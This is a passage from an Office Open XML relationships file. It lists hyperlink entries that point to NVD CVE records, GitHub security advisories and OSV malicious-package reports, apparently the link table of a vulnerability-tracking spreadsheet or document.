Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87564" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87567" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87568" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87573" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87574" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87577" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87586" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87592" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87596" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87598" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87619" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87622" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87630" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87632" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87642" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87651" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87658" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87735" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87736" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87875" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87994" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87997" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70665" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87432" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87465" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87472" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87502" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87538" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87559" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87624" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87641" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63466" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84113" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39113" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49312" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79516" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80213" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87486" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13144" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13146" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54713" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79690" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79729" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79732" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79736" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81168" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84307" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33333" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46460" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76816" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77508" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77573" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81846" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79693" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79942" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79944" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87456" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87576" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87647" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38093" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54548" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79727" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79966" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80169" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80175" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49456" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87434" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87442" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87451" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87452" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87485" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87498" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87517" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87521" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87531" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87539" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87611" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87614" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87652" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87657" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87876" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87525" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86424" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80239" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56317" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86198" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-xppm-jmw6-fhmf" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77648" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86744" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21109" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72924" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86170" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86215" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86234" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86265" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86279" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86285" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87923" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86181" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86271" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86227" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-24890" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-24978" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-24979" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-58363" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24442" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26350" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28523" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30922" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34412" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42027" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42151" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43635" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43645" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44282" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45674" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47691" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49947" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50024" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54529" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54920" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55073" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55891" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56125" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56341" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59157" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59158" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59160" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59172" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59176" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59177" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59179" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59185" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80915" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80916" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80917" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80918" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80919" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80920" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80922" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80923" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80925" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16109" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16090" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16083" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16084" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16108" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16088" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16110" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16087" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16089" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16068" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16067" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-hxjg-93wc-h8p8" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GO-2026-6302" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16092" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16066" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 